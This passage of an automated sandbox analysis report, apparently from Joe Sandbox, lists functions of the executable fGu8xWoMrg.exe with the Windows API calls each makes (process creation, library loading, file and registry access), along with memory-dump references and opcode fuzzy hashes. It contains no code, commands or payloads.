                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                            • Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                                                                                                                                            • Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                                                                                                                                            Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                                                                                                                                            Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                              • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                              • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                              • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                                                                                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                                                                                                                                            Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                            Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                            Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                            • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                            • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                                                                                                                                            Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                            Function 004063A2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                            • Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
                                                                                                                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
                                                                                                                                                                            Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                                                                                                                                            Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                                                                                                                                            Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                                                                                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
